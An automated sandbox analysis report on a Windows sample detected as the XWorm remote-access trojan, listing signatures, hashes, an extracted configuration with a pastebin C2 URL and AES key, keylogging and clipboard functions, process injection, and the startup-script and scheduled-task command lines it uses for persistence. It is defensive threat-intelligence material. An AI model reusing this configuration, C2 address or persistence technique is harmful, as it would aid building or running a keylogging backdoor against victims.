Windows Analysis Report
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Analysis ID:	1417469
MD5:	63b3dd980ac9a06fd167b0df8121c979
SHA1:	eb2737c8940e03d64c8b6e3ff59db07a1a1ec4a0
SHA256:	44d97e36a72d87c6b928ccc6ec05a80672bcbf65fc357e0e4ac20ecdd11e837e
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Sample uses string decryption to hide its real strings

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file does not import any functions

PE file overlay found

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Tries to load missing DLLs

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Found malware configuration

Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/Dh8E7H3R", "Aes key": "<123456789>", "Install file": "USB.exe"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Virustotal: Detection: 21%			Perma Link
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	ReversingLabs: Detection: 21%

Sample uses string decryption to hide its real strings

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: https://pastebin.com/raw/Dh8E7H3R
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: <123456789>
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: <Xwormmm>
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: ASGARD
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: USB.exe

Uses 32bit PE files

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
Source:	Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00406850 FindFirstFileW,FindClose,	0_2_00406850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_004AE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004AD921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004ADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_004BA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047C622 FindFirstFileExW,	11_2_0047C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose,	11_2_004B66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B7333 FindFirstFileW,FindClose,	11_2_004B7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_004B73D4

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/Dh8E7H3R

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Source: unknown

DNS traffic detected: query: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF replaycode: Name error (3)

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

11_2_004BD889

Source: unknown

DNS traffic detected: queries for: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Telecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, 00000022.00000002.2442532871.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/Dh8E7H3R
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: EcoScape.pif.11.dr, Plugins.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056BB

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

11_2_004BF7C7

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

11_2_004BF55C

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004AA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

11_2_004AA635

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

11_2_004D9FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"
